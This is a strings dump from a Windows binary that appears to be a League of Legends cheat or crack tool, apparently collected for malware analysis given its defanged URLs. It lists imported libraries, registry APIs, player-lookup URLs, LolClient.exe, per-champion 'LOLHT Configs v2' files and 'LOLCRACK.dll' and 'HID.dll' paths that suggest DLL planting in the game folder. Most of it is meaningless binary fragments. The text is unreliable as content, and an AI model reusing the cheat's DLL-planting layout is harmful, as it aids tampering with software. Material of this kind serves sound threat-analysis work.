S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
SkinH_EL.dll
keyWords=
hXXp://lolbox.duowan.com/playerList.php
hXXp://lolbox.duowan.com/playerList.php?keyWords=
V14.09.14.01
.properties
hXXp://lolbox.duowan.com/playerDetail.php?serverName=
_40x40.jpg
<img src="hXXp://img.lolbox.duowan.com/champions/
hXXp://img.lolbox.duowan.com/champions/
&nickname=
hXXp://VVV.lolhelper.cn/rank/rank.php
]cs
%%D(y
%u&~R
WM.cx
LolClient.exe
LOLHT Configs v2/.inim
LOLHT Configs v2/Aatrox.inim
LOLHT Configs v2/Ahri.inim
LOLHT Configs v2/Akali.inim
LOLHT Configs v2/Alistar.inim
LOLHT Configs v2/Amumu.inim
.BdgE}`[
LOLHT Configs v2/Anivia.inim
LOLHT Configs v2/Annie.inim
LOLHT Configs v2/AnnieTibbers.inim
LOLHT Configs v2/Ashe.inim
LOLHT Configs v2/Azir.inim
UÎU
LOLHT Configs v2/Blitzcrank.inim
LOLHT Configs v2/Brand.inim
LOLHT Configs v2/Braum.inim
LOLHT Configs v2/Caitlyn.inim
LOLHT Configs v2/Cassiopeia.inim
LOLHT Configs v2/Chogath.inim
LOLHT Configs v2/Corki.inim
LOLHT Configs v2/Darius.inim
LOLHT Configs v2/Diana.inim
LOLHT Configs v2/DrMundo.inim
LOLHT Configs v2/Draven.inim
LOLHT Configs v2/Elise.inim
LOLHT Configs v2/EliseSpiderling.inim
LOLHT Configs v2/Evelynn.inim
LOLHT Configs v2/Ezreal.inim
LOLHT Configs v2/FiddleSticks.inim
LOLHT Configs v2/Fiora.inim
LOLHT Configs v2/Fizz.inim
LOLHT Configs v2/Galio.inim
LOLHT Configs v2/Gangplank.inim
LOLHT Configs v2/Garen.inim
LOLHT Configs v2/Gnar.inim
LOLHT Configs v2/GolemODIN.inim
LOLHT Configs v2/Gragas.inim
LOLHT Configs v2/Graves.inim
LOLHT Configs v2/Hecarim.inim
LOLHT Configs v2/Heimerdinger.inim
LOLHT Configs v2/Irelia.inim
LOLHT Configs v2/Janna.inim
LOLHT Configs v2/JarvanIV.inim
.inim
Hd#.cm
LOLHT Configs v2/Jax.inim
LOLHT Configs v2/Jayce.inim
LOLHT Configs v2/Jinx.inim
LOLHT Configs v2/Kalista.inim
LOLHT Configs v2/Karma.inim
.JE5R
LOLHT Configs v2/Karthus.inim
LOLHT Configs v2/Kassadin.inim
LOLHT Configs v2/Katarina.inimUMS
LOLHT Configs v2/Kayle.inim
LOLHT Configs v2/Kennen.inim
LOLHT Configs v2/KhaZix.inim
LOLHT Configs v2/KogMaw.inim
LOLHT Configs v2/Leblanc.inim
LOLHT Configs v2/Leesin.inim
LOLHT Configs v2/Leona.inim
LOLHT Configs v2/Lissandra.inim
LOLHT Configs v2/Lucian.inim
LOLHT Configs v2/Lulu.inim
LOLHT Configs v2/Lux.inim
LOLHT Configs v2/Malphite.inim
LOLHT Configs v2/Malzahar.inim
LOLHT Configs v2/Maokai.inim
LOLHT Configs v2/MasterYi.inim
LOLHT Configs v2/MissFortune.inim
LOLHT Configs v2/Monkeyking.inim
LOLHT Configs v2/Mordekaiser.inim
LOLHT Configs v2/Morgana.inim
LOLHT Configs v2/Nami.inim
LOLHT Configs v2/Nasus.inim
LOLHT Configs v2/Nautilus.inim
LOLHT Configs v2/Nidalee.inim
LOLHT Configs v2/Nocturne.inim
LOLHT Configs v2/Nunu.inim
LOLHT Configs v2/Olaf.inim
LOLHT Configs v2/Orianna.inim
%Uk"N`
LOLHT Configs v2/Pantheon.inim
LOLHT Configs v2/Poppy.inim
LOLHT Configs v2/Quinn.inim
LOLHT Configs v2/Rammus.inim
LOLHT Configs v2/Renekton.inim
LOLHT Configs v2/Rengar.inim
LOLHT Configs v2/Rivan.inim
LOLHT Configs v2/Riven.inim
LOLHT Configs v2/Rumble.inim
LOLHT Configs v2/Ryze.ini
LOLHT Configs v2/Sejuani.inim
LOLHT Configs v2/Shaco.inim
LOLHT Configs v2/Shen.inim
LOLHT Configs v2/Shyvana.inim
LOLHT Configs v2/Singed.inim
LOLHT Configs v2/Sion.inim
LOLHT Configs v2/Sivir.inim
LOLHT Configs v2/Skarner.inim
LOLHT Configs v2/Sona.inim
LOLHT Configs v2/Soraka.inim
LOLHT Configs v2/Swain.inim
LOLHT Configs v2/Syndra.inim
LOLHT Configs v2/Talon.inim
LOLHT Configs v2/Taric.inim
LOLHT Configs v2/Teemo.inim
LOLHT Configs v2/Thresh.inim
LOLHT Configs v2/Tristana.inim
LOLHT Configs v2/Trundle.inim
LOLHT Configs v2/Tryndamere.inim
LOLHT Configs v2/TwistedFate.inim
LOLHT Configs v2/Twitch.inimTMs
LOLHT Configs v2/Udyr.inim
LOLHT Configs v2/Urgot.inim
LOLHT Configs v2/Varus.inim
LOLHT Configs v2/Vayne.inim
LOLHT Configs v2/Veigar.inim
LOLHT Configs v2/VelKoz.inim
LOLHT Configs v2/Vi.inim
LOLHT Configs v2/Viktor.inim
LOLHT Configs v2/Vladimir.inim
LOLHT Configs v2/Volibear.inim
LOLHT Configs v2/Warwick.inim
LOLHT Configs v2/Xerath.inim
LOLHT Configs v2/XinZhao.inim
LOLHT Configs v2/Yasuo.inim
LOLHT Configs v2/Yorick.inim
LOLHT Configs v2/Zac.inim
LOLHT Configs v2/Zed.inim
LOLHT Configs v2/Ziggs.inim
LOLHT Configs v2/Zilean.inim
LOLHT Configs v2/Zyra.inim
LOLHT Configs v2/dashen.inimR
LOLHT Configs v2/delevin.inim
LOLHT Configs v2/.ini
LOLHT Configs v2/Aatrox.ini
LOLHT Configs v2/Ahri.ini
LOLHT Configs v2/Akali.ini
LOLHT Configs v2/Alistar.ini
LOLHT Configs v2/Amumu.ini
LOLHT Configs v2/Anivia.ini
LOLHT Configs v2/Annie.ini
LOLHT Configs v2/AnnieTibbers.ini
LOLHT Configs v2/Ashe.ini
LOLHT Configs v2/Azir.ini
LOLHT Configs v2/Blitzcrank.ini
LOLHT Configs v2/Brand.ini
LOLHT Configs v2/Braum.ini
LOLHT Configs v2/Caitlyn.ini
LOLHT Configs v2/Cassiopeia.ini
LOLHT Configs v2/Chogath.ini
LOLHT Configs v2/Corki.ini
LOLHT Configs v2/Darius.ini
LOLHT Configs v2/Diana.ini
LOLHT Configs v2/DrMundo.ini
LOLHT Configs v2/Draven.ini
LOLHT Configs v2/Elise.ini
LOLHT Configs v2/EliseSpiderling.ini
LOLHT Configs v2/Evelynn.ini
LOLHT Configs v2/Ezreal.ini
LOLHT Configs v2/FiddleSticks.ini
LOLHT Configs v2/Fiora.ini
LOLHT Configs v2/Fizz.ini
LOLHT Configs v2/Galio.ini
LOLHT Configs v2/Gangplank.ini
LOLHT Configs v2/Garen.ini
LOLHT Configs v2/Gnar.ini
LOLHT Configs v2/GolemODIN.ini
LOLHT Configs v2/Gragas.ini
LOLHT Configs v2/Graves.ini
LOLHT Configs v2/Hecarim.ini
LOLHT Configs v2/Heimerdinger.ini
LOLHT Configs v2/Irelia.ini
LOLHT Configs v2/Janna.ini
LOLHT Configs v2/JarvanIV.ini
LOLHT Configs v2/Jax.ini
LOLHT Configs v2/Jayce.ini
LOLHT Configs v2/Jinx.ini
LOLHT Configs v2/Kalista.ini
LOLHT Configs v2/Karma.ini
LOLHT Configs v2/Karthus.ini
LOLHT Configs v2/Kassadin.ini
LOLHT Configs v2/Katarina.ini
LOLHT Configs v2/Kayle.ini
LOLHT Configs v2/Kennen.ini
LOLHT Configs v2/KhaZix.ini
LOLHT Configs v2/KogMaw.ini
LOLHT Configs v2/Leblanc.ini
LOLHT Configs v2/Leesin.ini
LOLHT Configs v2/Leona.ini
LOLHT Configs v2/Lissandra.ini
LOLHT Configs v2/Lucian.ini
LOLHT Configs v2/Lulu.ini
LOLHT Configs v2/Lux.ini
LOLHT Configs v2/Malphite.ini
LOLHT Configs v2/Malzahar.ini
LOLHT Configs v2/Maokai.ini
LOLHT Configs v2/MasterYi.ini
LOLHT Configs v2/MissFortune.ini
LOLHT Configs v2/Monkeyking.ini
LOLHT Configs v2/Mordekaiser.ini
LOLHT Configs v2/Morgana.ini
LOLHT Configs v2/Nami.ini
LOLHT Configs v2/Nasus.ini
LOLHT Configs v2/Nautilus.ini
LOLHT Configs v2/Nidalee.ini
LOLHT Configs v2/Nocturne.ini
LOLHT Configs v2/Nunu.ini
LOLHT Configs v2/Olaf.ini
LOLHT Configs v2/Orianna.ini
LOLHT Configs v2/Pantheon.ini
LOLHT Configs v2/Poppy.ini
LOLHT Configs v2/Quinn.ini
LOLHT Configs v2/Rammus.ini
LOLHT Configs v2/Renekton.ini
LOLHT Configs v2/Rengar.ini
LOLHT Configs v2/Rivan.ini
LOLHT Configs v2/Riven.ini
LOLHT Configs v2/Rumble.ini
LOLHT Configs v2/Sejuani.ini
LOLHT Configs v2/Shaco.ini
LOLHT Configs v2/Shen.ini
LOLHT Configs v2/Shyvana.ini
LOLHT Configs v2/Singed.ini
LOLHT Configs v2/Sion.ini
LOLHT Configs v2/Sivir.ini
LOLHT Configs v2/Skarner.ini
LOLHT Configs v2/Sona.ini
LOLHT Configs v2/Soraka.ini
LOLHT Configs v2/Swain.ini
LOLHT Configs v2/Syndra.ini
LOLHT Configs v2/Talon.ini
LOLHT Configs v2/Taric.ini
LOLHT Configs v2/Teemo.ini
LOLHT Configs v2/Thresh.ini
LOLHT Configs v2/Tristana.ini
LOLHT Configs v2/Trundle.ini
LOLHT Configs v2/Tryndamere.ini
LOLHT Configs v2/TwistedFate.ini
LOLHT Configs v2/Twitch.ini
LOLHT Configs v2/Udyr.ini
LOLHT Configs v2/Urgot.ini
LOLHT Configs v2/Varus.ini
LOLHT Configs v2/Vayne.ini
LOLHT Configs v2/Veigar.ini
LOLHT Configs v2/VelKoz.ini
LOLHT Configs v2/Vi.ini
LOLHT Configs v2/Viktor.ini
LOLHT Configs v2/Vladimir.ini
LOLHT Configs v2/Volibear.ini
LOLHT Configs v2/Warwick.ini
LOLHT Configs v2/Xerath.ini
LOLHT Configs v2/XinZhao.ini
LOLHT Configs v2/Yasuo.ini
LOLHT Configs v2/Yorick.ini
LOLHT Configs v2/Zac.ini
LOLHT Configs v2/Zed.ini
LOLHT Configs v2/Ziggs.ini
LOLHT Configs v2/Zilean.ini
LOLHT Configs v2/Zyra.ini
LOLHT Configs v2/dashen.ini
LOLHT Configs v2/delevin.ini
%Program Files%\360\lolhtpz.zip
\Game\HID.dll
LOLCRACK.dll
\hid.dll
.idata
.xzr0
.xzr1
P.rsrc
GetKeyboardType
KYaI%UJ
N%s._1
.aVQo
ug%u\
'()* ,-.
/0123456
789:;<=>
NthL.IQ
5\%S/X
c`4.IUh
Bp_Z.eWiS$U
%u{XP.WDhg
y%D{-Lk)&||
cQ.mFZ
l8)$*%X
$%xT|
I$S%U
*.tb4N
%C uI!
FD{e,%d/ýv
)bÊek!
#oj8%F
\.Hy}|
.Ji~0@
b8_.Ya
.CmU"
Ri&Ssh
?.tbI
=-AK}@
.CFX`
$%c&l
zK7%d
).tg`
|_.Kk
.Mqyg
I%u,hF
v.FHm
\-gf%s
.iWl_8
13Q%F
advapi32.dll
oleaut32.dll
RegOpenKeyExA
.ooVDV
bo.uLsf
^Zb%c
>.aST[
E=.hg
GFUGFEGF5GFÏ
URLQ
6%sMu<
%uvK@
7Y.oF
.KipBY
0M%c I
%og|qF.Cdf%
|{r%UGetConsoleOutputCP
RegCreateKeyExA
(6cntdll.dll
= =$=(=,=0=4=8=<=
0'0/050:0?0~0
= =$=(=0=4=8=@=
7 7(7,70787|7
5$5(5,545
: :$:(:0:4:8:@: